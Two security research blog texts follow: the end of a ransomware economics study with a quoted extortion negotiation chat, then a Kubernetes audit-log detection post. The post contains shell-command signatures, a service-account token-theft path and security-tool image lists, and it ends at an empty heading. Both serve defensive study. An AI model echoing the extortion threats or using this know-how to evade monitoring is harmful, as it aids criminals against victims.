“Thank you. Would it be possible to also receive a list of files? Thank you”

“Full file tree will be only able in 1-2 working days, quantity of data is so high. Proof pack of files we already started to prepare. Very soon will be sent. Here you are proof pack of your data, we are interested in to continue dialog with CEO, CFO. We are not interested in to talk with system administrators. Don’t worry we done full dump, files from your network by our smart filters.”

“Hello. Thank you for the sample files. When can we get a file tree?”

“Full file tree will be able after successful deal. In other case files will go to public & mass media. Proof package where provided already with some samples of documents and screenshot as well. Article able public for all, in 2 days we will start publicate data.”

“We thought we have almost 6 days left. Our leadership is currently reviewing the situation and determining the best resolution.”

“Until we waiting for your reply on situation. We stopped DDoS attack to your domain, you can switch on your website. As well your blog, where hidden. Nobody will see information about that, until we will not get in deal. We stopped already other instruments which already where processed today.”

“Okay, thank you. We want to cooperate with you. We just need some time during this difficult situation.”

“Hello. We would like to know how you came up with this price for us. It is very high.”

“Hello. We work on mathematical algorithms for each client price is different depending on their financial situation, sphere of activity and other aspects. In your situation price comes like is it. What price is not so high for you, then we have question.”

“Our industry has been suffering in revenue over the last couple of years and we don't make enough to pay even close to that much. Can you suggest a much lower amount that would satisfy you?”

“We have been asked before, we doesn’t get answer - on our question - What price is not so high for you ???”

“Can you please tell us what we will receive once payment is made?”

“You will get: 1) full decrypt of your systems and files 2) full file tree 3) we will delete files witch we taken from you 4) audit of your network”

“This situation is very difficult for us and we are worried we may get attacked again or pay and you will still post our data. What assurances or proof of file deletion can you give us?”

“We have reputation and word, we worry about our reputation as well. After successful deal you will get: 1) full file trees of your files 2) after you will confirm we will delete all information and send you as proof video, we are not interested in to give to someone other your own data. We never work like that.”

“Okay, thank you. We are going to have some meetings this weekend with our leadership. We need to assess our available funding and we can get back to you after that with what we can pay. Thank you for your patience.”

“We wait”

“These leadership meetings are going to take this weekend to complete. It may take until Monday to come up with what we might be able to pay.”

“OK”

“Hello. We would like to know if you would accept our offer of $300k? Our revenue has been severely impacted as the industry has suffered over the last few years, and we can not pay even close to the amount you have asked. We only hope you can understand our situation. Thank you.”

“Hello. Thank you for offer, sorry but we can't gave you so big discount. We know that all businesses are impacted by Covid-19, and financial crisis , etc. for Us the situation same. We have different questions to you 1) Your reputation costs 300 000 USD? And customer trust. 2) Costs for lawsuits with GDPR as well will cost nothing? 3) How about investors they already know about the situation? We always go forward to our clients. The legal losses will be much greater on today. In case of successful deal think about better offer, and come back. Time is settled and we will continue our procedures if you don’t take situation serious.”

“We of course understand the severity of the situation and have considered all of these issues, however we are offering what we have available. We are a very small company and do not have much revenue and we are offering what we can. We can try to come up with a little more, but it is not so much. We hope you can work with us as we try to satisfy the needs for both of us. Thank you.”

“What’s the offer?”

“We will get back to you shortly with a revised offer. Thank you”

“Hello. We would like to know if you would accept $350k? This is a significant amount of money for us at this time. Thank you.”

“We will never accept such ridiculous amount, make it x10 higher and we will think.”

“Thank you for your patience. Unfortunately the amount you are asking for is not something we are able to provide. We are a small company and do not have the revenue, and our insurance is not enough to help with this. We are able to increase our offer to $425k. Please let us know if you are willing to work with us in this. Thank you.”

“I said you, you must make your offer x10 higher. If you continue to make your ridiculous steps, we will ignore you.”

“And don't forget, you have the last 21 hours before price will be doubled and all discounts will be impossible, and sure, post with you sensitive data will be published.”

“Hello. We thank you again for your patience. We are asking for you to take into account the difficult position we are in. We do not have the cash funds available or insurance to pay the amount you are seeking. We are not even able to borrow the money right now. We are only able to offer you a little more money right now and this is the most we can do. We can only pay up to $500k. This is our final offer and are prepared for what will happen if you do not accept. If you accept we will arrange for the payment. Thank you for your consideration.”

“O.K. Your price is changed to 500 000 USD (in XMR Monero). We are ready for compromise.”

“Okay, thank you very much. Please add some time back to the timer so we can arrange for the funds to be sent. We will start the process right away.”

“We wait”

“Can you show us proof of ability to decrypt our files?”

“Of course. Send one file we will decrypt and send it back”

“Hello. We are getting close to finalizing making the payment. We will notify you when it is coming, but we would like to conduct a test transaction first. Please confirm you will provide the following when payment is made: 1) Decryption tool 2) File tree 3) Can you provide a link so we can download all of our files in case there is a problem decrypting them? 4) Proof of file deletion after we download all of the files.”

“1) decrypt tool you I will get instantly 2) file tree will start make after payment 3) all your files if will be needed we will share by link 4) and video of course. Write after sending money.”

“Great, thank you. Will 2250 xmr be okay? That was the amount we purchased because of the amount shown this morning. Now it shows more. We bought 2250.”

“OK”

“We are preparing to send a test transaction. Once we confirmed it works we will send the remaining amount. To confirm above mentioned, we will definitely want a link to download the files. Thank you.”

“Link for downloaded files will take time round - about 1 working day. Its not so easy how you think. We should prepare it for, you in case if you dont need full file tree.”

“Okay, thank you”

“Also, we see your payment. You have to send the rest.”

“Okay we will send the rest now”

“We can see your payment, after 10 confirmations we will do all that was promised.”

“Thank you”

Conclusion

This empirical research suggests that the ransomware ecosystem has developed into a sophisticated business. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profit. There are a number of well-executed studies focusing on fighting the (cyber-)criminal and on how adversaries penetrate given targets. However, despite the economics behind this ecosystem being its essential driver, it has oftentimes been overlooked.

We concluded that there are clear signs that adversaries have adopted price discrimination techniques based on the yearly revenue of their victims. If we look at the price setting and negotiation from the adversaries’ point of view, we see that they wield a massive advantage over their victims. Not only do they have the luxury of investigating their victims’ financial statements if they choose to do so, but they also have the advantage of previous experience to draw on. This conclusion can explain the current rise in ransomware infections around the world. Luckily, there are some strategies victims can use to diminish some of the advantages the adversary has, which we have covered extensively in the previous chapters.

Looking forward to the future of ransomware, it is no longer a question of whether a company is going to get breached, but rather a question of when. We have even heard people go as far as to say that it is almost an insult if your company does not get attacked nowadays, with an attack becoming a business badge of honour of sorts. Similarly, we also see that as more and more companies become ransomware victims, people are simply becoming tired of hearing about it. If the increase in ransom demands persists, and the decrease in public backlash continues, we could see a shift to companies paying less often, which would overall be better for society. On the other hand, this could also lead to criminals becoming more aggressive in their persuasion tactics, or lowering their ransom amounts to an equilibrium.

A bit of hope comes from some recent successes from law enforcement agencies. In November 2021 Romanian authorities arrested multiple individuals suspected of deploying the REvil ransomware on victims’ systems as part of operation GoldDust. This operation included authorities from 17 countries which joined efforts with Europol, Eurojust and Interpol. Similarly, in October 2021, another police cooperation between eight countries led to the arrest of twelve suspects that allegedly were part of a worldwide ransomware network. During this investigation multiple companies could be warned that ransomware was about to be deployed on their systems, preventing millions of dollars of damages. These cases are perfect examples of how we can tackle this wicked problem. These ransomware groups make victims in multiple countries and do not care about borders, so the only way to fight this is with coordinated international cooperation between police agencies around the world.

We hope that by sharing this research with the public we can add some fuel for the defending side. We demonstrated how powerful the adversaries are during the negotiation and, most importantly, have created a safety net for the unlucky victims who have fallen.

Let us look back at the hypothetical case we opened with. “We wait”, that was their reply after you told them you needed more time. After the entire investigation was over and all the systems had been restored, it became clear to you that they were not in a hurry. They had been in the company’s systems for three weeks prior to rolling out the ransomware. They had access to all your internal documents, including all finance-related statements. They knew everything about you, and you knew very little about them. They waited because they knew you would pay in the end. But how much did you end up paying? The full 3.5 million, or less? Or did you not end up paying at all? The end of this story will not be told by us, but by the countless cases that will continue to happen in the future. We just hope that the information we provided will help in making the right decisions for your situation.

Acknowledgement

We would like to express our special thanks to Nikki van der Steuijt, and all the members of the Fox-IT threat intelligence team.

References

[1] Adam Young and Moti Yung, Cryptovirology: Extortion-Based Security Threats and Countermeasures, IEEE Security and Privacy, May 1996
[2] Michael Sandee, CryptoLocker ransomware intelligence report, https://blog.fox-it.com/2014/08/06/cryptolocker-ransomware-intelligence-report/, August 6, 2014
[3] Maarten van Dantzig, FAQ on the WanaCry ransomware outbreak, https://www.fox-it.com/en/news/blog/faq-on-the-wanacry-ransomware-outbreak/
[4] SOPHOS, SamSam: The (Almost) Six Million Dollar Ransomware, https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf
[5] Hernandez-Castro, Julio and Cartwright, Edward and Stepanova, Anna, Economic Analysis of Ransomware (March 20, 2017). Available at SSRN: http://dx.doi.org/10.2139/ssrn.2937641
[6] A. C. Pigou, The Economics of Welfare, Macmillan and Co., Limited St. Martin’s Street, London, 1920

NCC Group Research

Detection Engineering for Kubernetes clusters

Written by Ben Lister and Kane Ryans

This blog post details the collaboration between NCC Group’s Detection Engineering team and our Containerisation team in tackling detection engineering for Kubernetes.
Additionally, it describes the Detection Engineering team’s more generic methodology around detection engineering for new/emerging technologies and how it was used when developing detections for Kubernetes-based attacks.

Part 1 of this post will offer a background on the basics of Kubernetes for those from Detection Engineering who would like to learn more about K8s, including what logging in Kubernetes looks like and the options available to detection engineers in using these logs.

Part 2 of this post offers a background on the basics of Detection Engineering for those from the containerization space who don’t have a background in detection engineering.

Part 3 of this post brings it all together, and is where we’ve made unique contributions. Specifically, it discusses the novel detection rules we have created around how privilege escalation is achieved within a Kubernetes cluster, to better enable security operations teams to monitor security-related events on Kubernetes clusters and thus to help defend them in real-world use.

If you are already familiar with Kubernetes, you may wish to skip forward to our intro to Detection Engineering in Part 2, or to our work on detection engineering for Kubernetes in Part 3.

Part 1: Background – Introduction to Kubernetes

Before talking about detections for Kubernetes, this section offers a brief overview of what Kubernetes is, its main components, and how they work together.

What is Kubernetes?

Kubernetes (commonly stylized as K8s) is an open-source container-orchestration system for automating computer application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. It aims to provide a "platform for automating deployment, scaling, and operations of Container workloads". It works with a range of container tools and runs containers in a cluster, often with images built using Docker. [1]

Figure 1: A typical cluster diagram. More information on the components can be found here

At a high level, the cluster can be divided into two segments: the control plane and the worker nodes. The control plane is made up of the components that manage the cluster, such as the API server, and it is this control plane where we focused our detection efforts, which will be discussed later on.

Whilst we’re discussing the various components of a cluster, it is important to quickly note how authentication and authorization are handled. Kubernetes uses roles to determine whether a user or pod is authorized to make a specific connection/call. Roles are scoped to either the entire cluster (ClusterRole) or a particular namespace (Role).

Each role declares a list of resources (the objects) it grants access to and a list of verbs that may be performed on those resources. Roles are then attached to RoleBindings, which link the role (the permissions) to users and systems. More information on this functionality can be found here in the Kubernetes official documentation.

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "watch", "list"]

Figure 2: Example of a policy configuration taken from the Kubernetes documentation

The above policy allows any system or user it is bound to to retrieve information on pod resources located in the default namespace of the cluster.

Why use Kubernetes?

Kubernetes provides the capability to scale horizontally as opposed to vertically, i.e., spreading the workload by adding more nodes instead of adding more resources to existing nodes.

Kubernetes is an enticing proposition for many companies because it provides them with the ability to document configurations, disperse applications across multiple servers, and configure auto-scaling based on current demand.

Kubernetes Logging

Detection engineers are only as good as their data. That is why finding reliable and consistent logs is the first problem that needs solving when approaching a new technology for detection engineering. This problem is made harder as there are multiple ways of hosting Kubernetes environments, such as managed platforms like Azure Kubernetes Service (AKS), Amazon Elastic Kubernetes Service (EKS) and Google Kubernetes Engine (GKE), as well as running Kubernetes natively as an unmanaged solution.

Ultimately, we decided to utilise API server audit logs. These logs provide a good insight into what is going on inside the cluster, due to the nature of the API server. In normal operation, every request to make a change on the Kubernetes cluster goes through the API server. It is also the only log source consistent among all platforms.

However, there are some issues raised by using these logs. Firstly, they need to be enabled; the audit policy detailed here is a good start and is what was used in our testing environments. Some managed platforms will not let you customise the audit logging, but it still needs to be enabled. From a security perspective, certain misconfigurations, such as unauthenticated access to Kubelets, would allow an attacker to bypass the API server, making these logs redundant and therefore bypassing all our detections.

It is important to note that audit logs will tell you everything that is happening from an orchestration perspective (pods being deployed, configuration changes, users being added, etc.), not what is happening inside the containers, which in some cases tends to be where the initial compromise occurs. An audit policy that is too broad can easily generate a lot of irrelevant events, so the configuration should be tested to ensure that ingestion of these events stays within acceptable limits.
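One way to test an audit policy before committing to full ingestion is to count how many events each kind of request produces. The following is a minimal sketch, not part of the original tooling. It assumes the audit events are available as one JSON object per line, and it only reads fields that exist in API server audit events (level, verb, objectRef). The function name summarise_audit_events and the sample events are hypothetical.

```python
import json
from collections import Counter
from typing import Iterable


def summarise_audit_events(lines: Iterable[str]) -> Counter:
    """Count audit events by (level, verb, resource[/subresource]).

    Hypothetical helper: assumes one JSON-encoded audit event per line.
    """
    counts: Counter = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the summary
        if not isinstance(event, dict):
            continue
        # Requests to non-resource URLs (e.g. /healthz) carry no objectRef.
        object_ref = event.get("objectRef") or {}
        resource = object_ref.get("resource", "<non-resource>")
        subresource = object_ref.get("subresource")
        if subresource:
            resource = f"{resource}/{subresource}"
        key = (event.get("level", "?"), event.get("verb", "?"), resource)
        counts[key] += 1
    return counts


if __name__ == "__main__":
    # Illustrative events only; real input would come from the audit log.
    sample = [
        '{"level": "Request", "verb": "create", '
        '"objectRef": {"resource": "pods", "subresource": "exec"}}',
        '{"level": "Metadata", "verb": "get", "requestURI": "/healthz"}',
    ]
    for key, count in summarise_audit_events(sample).most_common():
        print(count, key)
```

Sorting the result by count shows which level, verb, and resource combinations dominate the volume. Those combinations are candidates for a lower audit level or for exclusion in the policy, provided no detection depends on them.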
    {
      "kind": "Event",
      "apiVersion": "audit.k8s.io/v1",
      "level": "Request",
      "auditID": "bd93fded-1f5a-4046-a37c-82d8909b2a80",
      "stage": "ResponseComplete",
      "requestURI": "/api/v1/namespaces/default/pods/nginx-deployment-75ffc6d4d-nt8j4/exec?command=%2Fbin%2Fbash&container=nginx&stdin=true&stdout=true&tty=true",
      "verb": "create",
      "user": {
        "username": "kubernetes-admin",
        "groups": [
          "system:masters",
          "system:authenticated"
        ]
      },
      "sourceIPs": [
        "<removed>"
      ],
      "userAgent": "kubectl/v1.21.2 (darwin/amd64) kubernetes/092fbfb",
      "objectRef": {
        "resource": "pods",
        "namespace": "default",
        "name": "nginx-deployment-75ffc6d4d-nt8j4",
        "apiVersion": "v1",
        "subresource": "exec"
      },
      "responseStatus": {
        "metadata": {},
        "code": 101
      },
      "requestReceivedTimestamp": "2021-10-21T08:39:05.495048Z",
      "stageTimestamp": "2021-10-21T08:39:08.570472Z",
      "annotations": {
        "authorization.k8s.io/decision": "allow",
        "authorization.k8s.io/reason": ""
      }
    }

Figure 3: A sample of an audit log

Part 2: Background – Detection Engineering Approach

This next section gives some background on our approach to detection engineering and is not specific to Kubernetes. If you are just here for the Kubernetes content, feel free to skip it and the rest of the blog will still be understandable.

When approaching a problem, it can be helpful to break it down into simpler steps. We do this in detection engineering by splitting our detections into categories. These categories allow us to look at the problem through the lens of each category, and this helps create a well-balanced strategy that incorporates the different types of detection. There are three distinct categories, and each has its own strengths and weaknesses, but all contribute to an overall detection strategy. The categories are signatures, behaviours, and anomalies.

Signatures

Signatures are the simplest category. It includes detections that are predominantly based on string matching and known Indicators of Compromise (IoCs).
They are simple to create and so can be produced quickly and easily. They are usually very targeted to a single technique or procedure, so they produce low numbers of false positives and are easy for a SOC analyst to understand. However, they are usually trivial to bypass and should not be relied upon as the sole type of detection. Nonetheless, signatures are the first level of detection and allow for broad coverage over many techniques.

Behaviours

Behavioural analytics are more robust than signatures. They are based on breaking down a technique to its core foundations and building detections around that. They are usually based on more immutable data sources, ones that can’t be changed without changing the behaviour of the technique itself. While the quality of the detection itself is usually higher, the quality of the alert is comparatively worse than signature-based analytics. They will likely produce more false positives, and it will be harder to understand exactly why any alert is being produced, due to the more abstract nature of the analytics and the need for a more in-depth understanding of the technique being detected.

Anomalies

Anomaly analytics are any detections where "normal" behaviour is defined and anything outside of normal is alerted on. These kinds of analytics are not necessarily detecting anything malicious, but anything significantly different enough to be worth further investigation. A single anomaly-based detection can be effective against a wide range of different techniques. However, their performance can be harder to evaluate compared to signatures and behavioural detections, as performance may differ significantly depending on the environment. This can be mitigated somewhat by using techniques that calculate the thresholds based on historical data, which means the thresholds are tailored to that environment.

Understanding your advantage

The other concept that is useful when approaching detection engineering is "knowing where we can win".
This is the idea that for any given environment/system/technology there will be areas where defenders have a natural advantage. This may be because the logging is better, the attacker is forced into doing something, or there is a limited number of options for an attacker. For example, in a Windows environment the defender has an advantage when detecting lateral movement. This is because there is twice as much logging (logs can be available on both the source and destination host), there is a smaller number of techniques available compared to other tactics such as execution, and an attacker will usually have to move laterally at some point to achieve their goals.

Part 3: Kubernetes Detections

Through our collaboration with NCC Group’s Containerisation team, we identified several use cases that needed detection. The main area on which we decided to focus our efforts was how privilege escalation is achieved within the cluster. The two main ways this is done are abusing the privileges of an existing account and creating a pod to attempt privilege escalation. All our detections are based on events generated by audit logs. For brevity, only a subset of our detections will be described in this blog.

Signatures

The audit logs are a useful source for signature-based detection, since they provide valuable information, such as request URIs, user-agents and image names where applicable. These fields in the data can be matched against lists of known suspicious and malicious strings. These lists can then be easily updated, for example, adding new signatures and removing older signatures based on their effectiveness.

Interactive Command Execution in RequestURI

For certain requests the requestURI field within an audit log contains the command being executed, and the namespace and pod the command is being applied to. This can be used to identify when a command shell is being used and may indicate further suspicious behaviour if unauthorized.
Shell signatures can be used to detect this type of behaviour in the requestURI field. A full example of how this might look in an audit log can be seen in Figure 3 earlier in the blog. Some examples of signatures that are useful to search for are:

• %2Fbin%2Fbash
• %2Fbin%2Fsh
• %2Fbin%2Fash

User-Agent

The user-agent is an HTTP header that provides meta information on the kind of operating system and application that is performing the request. In some cases, it can also be used to identify certain tooling making requests. One example of using this field for signature-based detection is looking for User-Agents containing "access_matrix". Any occurrence of this would signify that an access review tool called Rakkess is being used. This tool is a kubectl plugin and would be expected within, say, a dev or staging cluster. When the use is unexpected, this may be indicative of an attacker performing post-compromise actions.

    "userAgent": "kubectl-access_matrix/v0.0.0 (darwin/amd64) kubernetes/$Format"

Another example might be the use of cURL or HTTP request libraries, which may indicate post-exploit actions, especially when they have not previously been seen in the environment. It is important to note that the user-agent can be modified by the source, so it is trivial to bypass this type of detection.
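As a rough illustration of the two signature types above, the following Python sketch checks a single parsed audit event for an interactive shell in the requestURI and for suspicious user-agent substrings. The function name, the signature lists and the alert labels are our own illustrative choices, not part of any product. Note that the sketch URL-decodes the query string before matching, which is equivalent to searching for the encoded strings listed earlier.

```python
from __future__ import annotations

from urllib.parse import parse_qs, urlsplit

# Illustrative signature lists (assumptions); tune them for your environment.
SHELL_PATHS = {"/bin/bash", "/bin/sh", "/bin/ash"}
SUSPICIOUS_AGENT_SUBSTRINGS = ("access_matrix", "curl", "python-requests")


def match_signatures(event: dict) -> list[str]:
    """Return the names of the signatures that fire for one audit event."""
    hits = []

    # parse_qs URL-decodes values, so %2Fbin%2Fbash becomes /bin/bash.
    query = parse_qs(urlsplit(event.get("requestURI", "")).query)
    if any(cmd in SHELL_PATHS for cmd in query.get("command", [])):
        hits.append("interactive_shell")

    # Case-insensitive substring match on the user-agent header.
    agent = event.get("userAgent", "").lower()
    if any(sig in agent for sig in SUSPICIOUS_AGENT_SUBSTRINGS):
        hits.append("suspicious_user_agent")

    return hits
```

Run against the event in Figure 3, this sketch would report only the interactive shell, since the user-agent there is plain kubectl.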

Image

The image field includes the name of the image to be deployed and the registry from which it came. It can be matched against the images of known security assessment tools. These tools all have legitimate use cases, but any unauthorized use of them on a Kubernetes cluster should be alerted on and investigated further.

Some examples of such images include, but aren’t limited to:

• cyberark/kubiscan
• aquasec/kubehunter
• cloudsecguy/kubestriker
• corneliusweig/rakkess

The image field could also be utilised to detect when pods are being deployed for crypto-mining purposes. Running crypto miners after compromising a cluster is a commonly seen tactic and any known crypto mining images should also be added as a signature for known bad container images.
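A minimal sketch of image-based matching is shown below. It assumes the audit policy logs pod creation at a level that includes the request body, and that containers are found under requestObject.spec.containers as in a standard Pod spec; both helper names are hypothetical. The registry host, tag and digest are stripped before comparison so that the same image pulled from a mirror still matches.

```python
from __future__ import annotations

# Known assessment-tool images taken from the list above.
KNOWN_TOOL_IMAGES = {
    "cyberark/kubiscan",
    "aquasec/kubehunter",
    "cloudsecguy/kubestriker",
    "corneliusweig/rakkess",
}


def image_repository(image: str) -> str:
    """Reduce an image reference to its repository path (no host, tag or digest)."""
    name = image.split("@", 1)[0]  # drop a digest such as @sha256:...
    if ":" in name.rsplit("/", 1)[-1]:  # a colon after the last slash is a tag
        name = name[: name.rfind(":")]
    parts = name.split("/")
    # Heuristic: a first component with a dot or port, or "localhost", is a registry host.
    if len(parts) > 1 and ("." in parts[0] or ":" in parts[0] or parts[0] == "localhost"):
        parts = parts[1:]
    return "/".join(parts).lower()


def flagged_images(event: dict) -> list[str]:
    """Return the container images in a pod creation event that match a known tool."""
    spec = (event.get("requestObject") or {}).get("spec") or {}
    images = [c.get("image", "") for c in spec.get("containers") or []]
    return [img for img in images if image_repository(img) in KNOWN_TOOL_IMAGES]
```

The same structure can be reused for known crypto-mining images by adding them to the set.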

Anonymous User Logon

With any system, a user performing actions without authenticating is usually a bad thing. Kubernetes is no different, and there have been some high-profile incidents where the initial access was an API server exposed to the internet which allowed unauthenticated access. The first line of defence would be to mitigate the attack by disabling unauthenticated access. This can be done with the --anonymous-auth=false flag when starting a kubelet or API server.

As an additional layer of defence, any request to the API server where the user field is system:anonymous or system:unauthenticated should also be alerted on.
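A small sketch of this check follows. It assumes the event has been parsed into a dictionary shaped like Figure 3, and it treats system:anonymous as a username and system:unauthenticated as a group membership, which is how Kubernetes reports anonymous requests; the function name is ours.

```python
ANONYMOUS_USER = "system:anonymous"
UNAUTHENTICATED_GROUP = "system:unauthenticated"


def is_anonymous_request(event: dict) -> bool:
    """True when the audit event was made without authentication."""
    user = event.get("user") or {}
    groups = user.get("groups") or []
    return user.get("username") == ANONYMOUS_USER or UNAUTHENTICATED_GROUP in groups
```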

Service Account Compromise

Kubernetes pods run under the context of a service account. Service accounts are a type of user account created by Kubernetes and used by the Kubernetes systems. They differ from standard user accounts in that their usernames are prefixed with “system:serviceaccount:” and they usually follow well-defined behaviours. To authenticate as a service account, every pod stores a bearer token in /var/run/secrets/kubernetes.io/serviceaccount/token, which allows the pod to make requests to the API server. However, if the pod is compromised by an adversary, they will have access to this token and will be able to authenticate as the service account, potentially leading to an escalation of privileges.

Detecting this type of compromise can be difficult as we won’t necessarily be able to differentiate between normal service account usage and the attacker using the account. However, the advantage we have is that service accounts have well-defined behaviour. A service account should never send a request to the API server that it isn’t authorised to make. Additionally, a service account should never have to check the permissions it has. Both actions are more indicative of a human using the service account rather than the system. Therefore, any request where the username starts with “system:serviceaccount:” and that is either denied or has a resource field containing “selfsubjectaccessreview” should be alerted on.
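The two service account behaviours can be sketched as follows. The sketch assumes the event layout shown in Figure 3, treats a request as denied when the authorization.k8s.io/decision annotation is "forbid" or the response code is 403, and uses alert labels of our own choosing.

```python
from __future__ import annotations

SERVICE_ACCOUNT_PREFIX = "system:serviceaccount:"


def service_account_alerts(event: dict) -> list[str]:
    """Return behavioural alerts for requests made by a service account."""
    username = (event.get("user") or {}).get("username", "")
    if not username.startswith(SERVICE_ACCOUNT_PREFIX):
        return []

    alerts = []

    # A denied request suggests someone is probing what the token can do.
    decision = (event.get("annotations") or {}).get("authorization.k8s.io/decision")
    status = (event.get("responseStatus") or {}).get("code")
    if decision == "forbid" or status == 403:
        alerts.append("denied_request")

    # Workloads rarely need to ask which permissions they hold.
    resource = (event.get("objectRef") or {}).get("resource", "")
    if "selfsubjectaccessreview" in resource.lower():
        alerts.append("permission_self_check")

    return alerts
```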

Other Notable Behaviours

The major behaviour we have not covered in detail in this post is how Kubernetes handles Role-Based Access Control (RBAC). RBAC is a complex topic in Kubernetes and warrants its own blog post to go into all the different ways it can be abused. However, in any system it is worth alerting on high-privilege permissions being assigned to users, and this should be handled in any Kubernetes detections as well.

A ‘short lived disposable container’ is another behaviour that can indicate malicious behaviour. Shell access to containers configured with tty set to true, and a restart policy set to never are highly suspicious on an operational cluster. It’s unlikely there is a genuine need for this, and it could indicate an attacker trying to cover up their tracks.

Finally, the source IP is present in all audit log events. Any request outside of expected IP ranges should be alerted on, particularly for public IP ranges as this may indicate that the API server has been accidentally exposed to the internet.
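The source IP check can be sketched with Python's standard ipaddress module. The expected ranges below are placeholders and would need replacing with the ranges actually used to reach the API server; the function name and labels are also hypothetical.

```python
from __future__ import annotations

import ipaddress

# Placeholder ranges (assumption): replace with your own management networks.
EXPECTED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def unexpected_source_ips(event: dict, expected=EXPECTED_NETWORKS) -> list[tuple[str, str]]:
    """Return (ip, reason) pairs for source IPs outside the expected ranges."""
    findings = []
    for raw in event.get("sourceIPs") or []:
        try:
            ip = ipaddress.ip_address(raw)
        except ValueError:
            # Redacted or malformed values are surfaced rather than ignored.
            findings.append((raw, "unparseable"))
            continue
        if any(ip in net for net in expected):
            continue
        # Public addresses are the higher-priority case.
        findings.append((raw, "public" if ip.is_global else "unexpected_internal"))
    return findings
```

Public addresses are labelled separately because they may indicate an API server exposed to the internet.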

Anomalies

One of the questions we asked ourselves was “How do we know when a pod has been created for malicious purposes?”. There are multiple ways a pod could be configured that would allow some form of privilege escalation. However, each of these configurations has a legitimate use case, and it is only when they are used in a way that deviates from normal behaviour that they become suspicious.

In order to create detections for this, the following assumption was made: pods created by a single company will follow similar patterns in their configuration, and deviations from these patterns would include pods that are suspicious and worth putting in front of an analyst to investigate further.

Anomaly detection by Clustering

To do this we used a technique called clustering. This blog will not go into much detail on exactly how the clustering works; some SIEMs, such as Splunk, have built-in functions that allow this kind of processing to be done with minimal effort. Clustering involves taking multiple features of an object, in this case the configuration of the pod, and grouping the objects so that objects with similar features are in the same group. The easiest way of describing clustering and how we can find anomalies is through visualising it.

The diagram shows a set of objects that are split into clusters based on two features. It’s trivial to see two large groups of points, cluster 1 and cluster 2, that have been grouped based on feature similarity. The assumption would be that any object in these clusters is normal. The anomaly is the red triangle, since its features do not follow the pattern of the other objects and therefore it would be worth further investigation.

Feature Extraction

The important part is choosing the right features to cluster on. We want to identify features of pod creation that remain consistent during normal activity (e.g., the user creating the pod and the registry of the container image), since changes in these would indicate suspicious behaviour. We also want to identify settings that could allow some form of privilege escalation, since changes in these settings could indicate a malicious pod being created. For this we consulted our internal containerisation team, and the list of features decided upon can be found in the table below. Also included is the JSON path at which each field can be found in the audit log.

Feature | Description | JSON path in audit log
Image Registry | Registry in which the container image is stored. Effective when using a custom container registry | requestObject.spec.container.image
User | User sending the request. Effective when a subset of users create pods | user.username
Privileged Container | When enabled, privileged containers have access to all devices on the host | requestObject.spec.container.securityContext.privileged
Mounted Volumes | Indicates which directories on the host the container has access to. Mounting /host gives access to all files on the host | requestObject.spec.container.volumeMounts.mountPaths
HostNetwork | When enabled, the container has access to any service running on localhost on the host | requestObject.spec.container.HostNetwork
HostIPC | When enabled, containers share the IPC namespace of the host. Allows inter-process communication with processes on the host | requestObject.spec.container.HostIPC
HostPID | When enabled, containers share the PID namespace of the host. Allows for process listing of the host | requestObject.spec.container.HostPID
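The feature extraction can be sketched in Python as below. This is an illustration under assumptions rather than our production logic: it reads the fields from where a standard Pod spec places them (spec.containers[].image, spec.containers[].volumeMounts[].mountPath, and spec.hostNetwork, spec.hostIPC and spec.hostPID at pod level), which may differ from how a given SIEM flattens the paths in the table. The helper names and the "(default)" placeholder for images without an explicit registry are hypothetical.

```python
def image_registry(image: str) -> str:
    """Return the registry host of an image reference, or a placeholder if none is given."""
    first, _, rest = image.partition("/")
    if rest and ("." in first or ":" in first or first == "localhost"):
        return first
    return "(default)"


def extract_features(event: dict) -> dict:
    """Build the clustering features for one pod creation audit event."""
    spec = (event.get("requestObject") or {}).get("spec") or {}
    containers = spec.get("containers") or []

    registries = sorted({image_registry(c.get("image", "")) for c in containers})
    mounts = sorted(
        {m.get("mountPath", "") for c in containers for m in (c.get("volumeMounts") or [])}
    )
    privileged = any(
        (c.get("securityContext") or {}).get("privileged", False) for c in containers
    )

    return {
        "registry": ",".join(registries),
        "user": (event.get("user") or {}).get("username", ""),
        "privileged": privileged,
        "mounts": ",".join(mounts),
        "hostNetwork": bool(spec.get("hostNetwork", False)),
        "hostIPC": bool(spec.get("hostIPC", False)),
        "hostPID": bool(spec.get("hostPID", False)),
    }
```

Sorting the registries and mount paths keeps the output stable regardless of the order in which containers are declared, which matters when the features are later joined into a single string.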

Bringing it all together

Splunk contains a cluster command which is perfect for this use case. By creating a single string of the features delimited by a character of our choice, we can assign all pod creation events to a cluster. The exact time period to run the command over is subject to a trade-off between performance of the detection and performance of the query. The longer the lookback, the less chance of false positives, but the longer the time the query takes to run. After some trial and error, we found 14 days was a good middle ground but could be increased up to 30 days for smaller environments.

Once the cluster command has run, we can look for any events assigned to a cluster where the overall size of the cluster is relatively small. These will be events that are sufficiently different from the rest that we will want to flag them as suspicious and have an analyst investigate further.
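The idea of flagging small clusters can be illustrated outside Splunk with a deliberately simplified Python sketch. Here events are grouped only when their delimited feature strings are identical, whereas a similarity-based clustering command would also group strings that are merely close to each other, so this sketch will flag more events than a real deployment would. The function names and the size threshold are assumptions.

```python
from __future__ import annotations

from collections import Counter


def feature_key(features: dict, delimiter: str = "|") -> str:
    """Join the features into a single delimited string, in a stable order."""
    return delimiter.join(f"{name}={features[name]}" for name in sorted(features))


def rare_events(feature_dicts: list[dict], max_cluster_size: int = 1) -> list[int]:
    """Return the indexes of events whose group is no larger than max_cluster_size."""
    keys = [feature_key(f) for f in feature_dicts]
    sizes = Counter(keys)
    return [i for i, key in enumerate(keys) if sizes[key] <= max_cluster_size]
```

For example, twenty pods created by the same deployment account from the usual registry form one large group, while a single privileged pod created by a different user ends up alone and is returned for investigation.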

Conclusions

